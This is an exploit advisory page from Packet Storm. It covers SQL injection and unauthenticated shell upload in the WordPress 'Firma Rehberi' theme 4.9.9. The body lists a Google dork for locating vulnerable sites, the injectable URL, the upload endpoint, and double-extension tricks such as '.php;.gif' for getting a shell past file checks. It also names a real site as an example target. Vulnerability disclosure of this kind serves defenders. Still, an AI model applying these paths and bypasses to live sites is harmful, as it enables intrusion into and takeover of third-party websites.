what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Firma Rehberi 4.9.9 Shell Upload / SQL Injection

WordPress Firma Rehberi 4.9.9 Shell Upload / SQL Injection
Posted Dec 22, 2018
Authored by KingSkrupellos

WordPress Firma Rehberi theme version 4.9.9 suffers from remote shell upload and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, sql injection
SHA-256 | c8c59e4a02f5403a340feabc1a089f4884ae51077e5c20ac3c4a8b5295873a49

WordPress Firma Rehberi 4.9.9 Shell Upload / SQL Injection

Change Mirror Download
#################################################################################################

# Exploit Title : WordPress Firma Rehberi Themes 4.9.9 SQL Injection and
Remote Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 22/12/2018
# Vendor Homepage : wordpress.org ~ temafabrika.com/demo/rehber3/
# Software Download Link :
temafabrika.com/wordpress-responsive-firma-rehberi-3-temasi.html
# Software Price : 150 TL
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : V4.9.9 ~ PHP 5.6.30 ~ jQuery 1.12.2
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/themes/rehber/js/''
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements
used in an SQL Command ('SQL Injection') ]
CWE-264 - [ Permissions, Privileges, and Access Controls ] - + CWE-434- [
Unrestricted Upload of File with Dangerous Type ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# SQL Injection Exploit :

/wp-content/themes/rehber/index.php?id=1%27

# Arbitrary File Upload/Shell Upload Exploit :

/wp-content/themes/rehber/js/upload.php

# Directory File Path :

/fresim/resim[RANDOMNUMBERS][YOURFILENAMEHERE].php;.gif

# Note : .php;.gif ~ .asp;.png ~ .shtml.fla;.jpeg

#################################################################################################

# Example Vulnerable Site =>

[+] bagcilarfirmarehberi.com/wp-content/themes/rehber/js/upload.php

#################################################################################################

# SQL Database Error :

Fatal error: Call to undefined function get_header() in
/home/bagcilarfirma/public_html/wp-content/themes/rehber/index.php on line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    35 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close